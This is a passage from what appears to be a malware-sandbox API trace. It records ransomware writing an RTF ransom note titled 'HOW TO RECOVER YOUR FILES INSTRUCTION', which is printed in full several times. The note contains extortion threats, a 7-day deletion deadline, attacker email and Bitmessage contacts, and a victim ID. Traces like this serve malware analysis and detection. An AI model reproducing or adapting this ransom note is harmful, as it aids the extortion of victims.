h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0268.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0268.702] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0268.702] CloseHandle (hObject=0x2ec) returned 1 [0268.702] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\#readme_eman#.rtf")) returned 0xffffffff [0268.703] GetLastError () returned 0x2 [0268.703] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0268.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 